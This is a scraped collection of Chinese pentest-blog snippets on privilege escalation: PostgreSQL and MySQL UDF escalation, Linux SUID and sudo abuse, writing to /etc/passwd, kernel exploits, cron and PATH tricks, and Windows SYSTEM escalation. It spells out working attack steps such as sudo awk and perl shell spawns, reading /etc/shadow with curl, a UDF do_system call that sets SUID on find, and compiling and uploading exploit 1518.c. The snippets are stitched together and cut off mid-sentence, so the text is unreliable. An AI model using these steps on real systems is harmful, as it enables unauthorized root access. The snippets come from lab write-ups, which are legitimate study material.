遇到了处接管Postgresql,但是........我tm竟然没有用他来提权。后来经大哥提醒才知道这里可以利用UDF进行提权。遂为了下一次不再翻车,写下这篇笔记。...图片0x01正文--------第一步,先查看一下postgresql的版本select version();图片这里就知道了postgresql的版本是10.7接下来需要去官网下载对应环境的源码,然后编译它...fPIC -o lib\_postgresqludf\_sys.sostrip -sx lib\_postgresqludf\_sys.so图片接下来输出.so文件的十六进制并利用postgresql_udf_help...生成分片后的sql语句cat lib\_postgresqludf\_sys.so | xxd -ps | tr -d "\n" > 1.txtpython2 postgresql\_udf\_help.py...text AS '/tmp/testeval.so', 'sys\_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;图片最后尝试执行命令,成功提权图片
mysql之udf提权 前言 UDF简介 UDF (user defined function),即用户自定义函数。...root执行的环境下,我们就可以通过into dumpfile函数导入udf.dll进行提权。...有web脚本执行权限时,也可以直接上传udf提权脚本,快速搞定。...总结一下就是需要有mysql的root权限,就可以尝试使用UDF提权 这个第一个思路是针对没有web脚本执行的情况下进行的提权 若不确定是否是root权限可以使用命令查看一下 select * from...提权一般仅适用于windows系统,linux系统由于自身对plugin目录严格的写入权限,很难利用 参考博客链接:(96条消息) 20210415web渗透学习之Mysqludf提权(二)(胃肠炎住院期间转
MySQL提权 〇、Mysql提权的必备条件 Mysql的服务没有降权,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降权...可修改mysql配置文件(Windows下为my.ini, Linux下的my.cnf),在[mysqld]下面 修改完配置文件后,重启mysql生效。...提权 0、原理 UDF:用户自定义函数、通过添加新函数、对mysql进行功能扩充 官方定义:UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展...使用MSF中的 exploit/multi/mysql/mysql_udf_payload 模块也可以进行UDF提权。...而且也不能使用其他提权等手段。所以,我们现在要做的就是使用UDF进行提权。
今天给大家带来的是linux下的提权技巧。SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。...如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。...已知的可用来提权的linux可行性的文件列表如下: Nmap Vim find Bash More Less Nano cp 以下命令可以发现系统上运行的所有SUID可执行文件。...提权至Root权限 也可以通过Metasploit模块对Nmap的二进制文件进行权限提升。...Root权限的shell VIM Vim是Linux环境下的一款文件编辑器。但是,如果以SUID运行的话,它会继承root用户的权限,因此可以读取系统上的所有文件。
ash也是一种shell,占用资源很少的,管理员可能开启 sudo ash awk是一个强大的文本分析工具 sudo awk 'BEGIN {system("/bin/sh")}' 使用这个命令可以直接提权到...root bash提权 bash sudo bash csh同样是一种shell sudo csh curl 提权 sudo curl file:///etc/shadow dash 一些小型设备可能安装.../bin/sh env查询环境变量,可以查询环境变量的时候执行一下bin/sh文件 sodu env /bin/sh expect自动化交互套件,执行程序的时候可以交互 sudo expect -c.../bin/sh sudo man man man命令的详细解释 man命令是Linux下的帮助指令,执行两次出现问题后输入下面的代码读取使用bin/sh !...sudo perl -e 'exec "/bin/sh";' tclsh 脚本语言 sudo tclsh exec /bin/sh @stdout 2>@stderr git 提权
先nmap扫一下存活端口 可以发现有22,80,111这几个端口 首先从web下手,dirb扫一下目录可以知道是个wp站点 并且发现/vendor目录存在目录遍历 在/vendor/PATH目录下发现...以及其绝对路径 在/vendor/VERSION目录下得知PHPMailer版本号5.2.16 在kali中搜索phpmailer可以发现有个PHPMailer<5.2.18-远程命令执行 修改一下直接打...-c 'import pty;pty.spawn("/bin/bash")' 通过find命令找到flag3图片的路径 成功登入mysql后,可以看到是mysql5.5.60 接着我们尝试使用udf...提权,搜一下可以看到一个可利用的 然后我们将1518.c本地编译一下再上传 开启web服务 然后wget传进去1518.so 上传成功后,在靶机上链接mysql数据库并操作 create table...integer soname '1518.so'; select * from mysql.func; select do_system('chmod u+s /usr/bin/find'); 最后提权后得到
渗透场景当我们获得了某个Linux服务器的低权限之后,我们想要对该低权限账号进行提权,以执行更多的操作,而在提权过程中发现当前用户具有/etc/passwd文件的写权限,此时我们可以写一个用户进去完成提权...基础知识用户分类在Linux下,用户分为三类:超级用户(root)、普通用户、程序用户超级用户:UID=0 程序用户:Rhel5/6,UID=1-499; Rhel7,UID=1-999 普通用户:Rhel5...提权流程确定可写首先查看/etc/passwd 的权限,发现任何用户都可以对/etc/passwd文件进行读写操作:ls -lh /etc/passwd写入用户接下来要做的就是自己构造一个用户,在密码占位符处指定密码
这次通过VulnHUB靶场的Raven2来演示Mysql UDF提权,靶机地址: https://www.vulnhub.com/entry/raven-2,269/ 下载完靶机后直接安装并运行靶机...wp-config.php中找到密码 ok,接下来登录数据库,查看版本,是否进行udf提权 尝试UDF提权之前,先获取plugin路径 show variables like "%plugin%"; 然后直接复制...msf中udf提权脚本出来,安照脚本中的注释说明,按步骤生成’.so‘文件后上传至目标机plugin路径下 这是在线msf脚本地址: https://www.exploit-db.com/exploits...这里的chmod u+s /usr/bin/find当然也可以换成其他linux命令,回车后都会直接已root执行,只不过给find命令添加suid权限,更加方便与节省时间 select do_system...接下来我们就可以使用find来执行任何命令了 可以看见,通过find命令来执行的所有命令权限都为root权限,提权成功。然后很顺利的就找到了flag,这里有个小知识点,’find .
bash"); return 0; }' > /tmp/test/suid-shell.c 编译: gcc /tmp/test/suid-shell.c -o / tmp / 1 / suid-shel 赋权:...好的,我们回到要提权的服务器上 cd / tmp ./suid-shell ? 可以看到是ROOT权限了
在渗透中,我们拿到的webshell和反弹回来的shell权限可能都不高,如果我们可以使用sudo命令访问某些程序,则我们可以使用sudo可以提权。...sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。...按下并按Enter 使用less/more命令 sudo less / etc / hosts sudo more / etc / hosts 之后按!...让我们解释一下。 在At客者一边。 首先将Target的/ etc / passwd文件复制到攻击者计算机。 修改文件,并在上一步中保存的密码文件中添加用户到攻击者计算机。...在要提权主机方面。
系统漏洞提权 1、获取操作系统版本号 2、根据版本号搜索exp 3、反弹shell 4、尝试利用 1、获取系统版本号: 获取发行版本 • cat /etc/issue • cat /etc/*-release...redhat-release 获取内核版本 • cat /proc/version • uname -a • uname -mrs • rpm -q kernel • dmesg | grep Linux...gcc编译一下 exp.c 生成exp gcc exp.c -o exp -lpthread ? ?
前言 实际环境中会遇到过很多有shell但是权限不够的情况,那么对于我这种对内核提权的知识只存在脏牛提权的懒狗来说,最方便快捷的方式就是拿脚本来批量看当前版本的内核有哪些可以利用的脚本 正文 先搭建个环境...上传自动根据内核看提权的脚本 github:https://github.com/mzet-/linux-exploit-suggester 通过一句话木马上传该.sh文件 ?
系统漏洞提权 1、获取操作系统版本号 2、根据版本号搜索exp 3、反弹shell 4、尝试利用 1、获取系统版本号: 获取发行版本 • cat /etc/issue • cat /etc/*-release...redhat-release 获取内核版本 • cat /proc/version • uname -a • uname -mrs • rpm -q kernel • dmesg | grep Linux...gcc编译一下 exp.c 生成exp gcc exp.c -o exp -lpthread ? ?...推荐阅读 记一次曲折的Linux提权 https://www.freebuf.com/column/188852.html
前言 之前 红队视角下Linux信息收集 中提到过提权的信息收集命令,但没有细讲。本篇文章将着重于各种linux提权手段,总结提权的条件和原理。...--- 简单总结一下,红队的常规提权手段有: [1.png] 系统信息 按照上面提权的手段,梳理一下需收集的系统信息: 内核和发行版信息 系统信息 Hostname 网卡信息 路由信息 DNS信息 用户信息...: 软件版本信息 sudo mysql udf提权 mof提权 postgres apache user config 启用的模块 htpassword文件 www目录 弱认证 检查默认/弱的Postgres...提权了,基本不会查看其他用户。...提权手段,并总结了sudo、suid和sgid的原理,具体利用手段没有涉及。
/shell nmap --script=shell 全版本通杀提权,利用nmap可以执行指定文件的特点提权 2.find find / -exec command find命令自带-exec参数,可以执行命令...,若find有suid权限,那么使用exec相当于直接提权到root....command 进行提权到root 6.exim exim在特定版本下会有suid提权 下载exp打就完事了 rbash 绕过 何为rbash rbash,是出于安全性考虑的一个功能受限的bash,...suid提权,就可以试试搭配环境变量进行提权。...查找十分钟内更改过的文件 find / -mmin -10 2>/dev/null | grep -Ev "^/proc" (不显示^/proc文件或文件夹) capabilities capabilities 是linux2.2
#include <windows.h> bool AdjustPrivileges() { HANDLE hToken = NULL; TO...
以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写 UDF提权原理 用户可以自定义提权的函数(比如执行系统命令)来进行提权。...UDF提权条件 1.Mysql版本大于5.1时,udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。...2.Mysql版本小于5.1版本时,udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。.../LinEnum.sh 9.利用UDF提权,先找到exp文件(/usr/share/exploitdb/exploits/linux/local/1518.c) 10.编译exp gcc -g -c 1518...shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc 11.上传1518.so文件到靶机(可以创建webshell用蚁剑连接上传) 12.连接mysql 13.提权
可以使用sudo -l命令列出用户可以使用sudo运行的所有命令 ls 虽然是linux常见命令,但在寻找潜在的提权途径,使用-la参数显示隐藏文件(以点开头)以及更详细的文件权限和其他信息,以避免错过潜在的文件或目录...阅读漏洞利用代码提供的所有注释和说明 您可以分别使用 SimpleHTTPServer Python 模块和 wget 将漏洞利用代码从您的机器传输到目标系统 Sudo提权 默认情况下,sudo命令允许用户以...Cron Jobs提权 Cron jobs用于在特定时间运行脚本或二进制文件。默认情况下,它们以其所有者而不是当前用户的权限运行。...这样在这个路径下创建一个同名的脚本,它应该由 cron jobs 运行。 PATH提权 Linux 中的 PATH 是一个环境变量,它告诉操作系统在哪里搜索可执行文件。...此提权的关键元素是文件中的no_root_squash选项。默认情况下,NFS会将root用户更改为nfsnobody,并阻止任何文件以root权限运行。
提权就是一个低权限向高权限转化的过程 基于之前的文章,我们获取了一个低权限账户,现在朝着高权限进发 我们现在既然有了低权限账号密码,那么我们就可以登陆3389等远程服务,从而使用一些本地提权的方法 在开始提权之前...,我们还是需要先了解一下各个操作系统之间的权限分配 Windows User Administrator System 之前在第一期培训时候我说错了一个观点就是说...权限 ---- at命令提权 这个方法相对来说有些古老,之前我在一些技术书籍中还能看到 at 命令提权的原理是at 命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用的是system权限 Win2003...可以看到我们的权限已经是system了 这个是本地提权,我们看看能不能远程提权(3389属于本地提权了哈) 远程提权需要反弹一个system的shell,我们以nc为例 首先我们用echo命令吧需要执行的命令写入到批处理中...,之后定时执行批处理文件 最好把文件写入到没有空格的路径下,我把nc已经拷贝到c盘根目录了 ?
可以看到有147个小工具 psexec 这个工具可以以System账号执行一个程序 适合于本地提权 psexec -i -s cmd -i 使用交互模式运行程序 -s 使用SYSTEM账号来运行 ?...可以看到本地提权成功! 下面我来尝试远程提权,如果能够反弹一个System权限的nc连接,就算成功 ? 这个是拿XP做的实验,现在我们拿win10来测试一下 ?
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
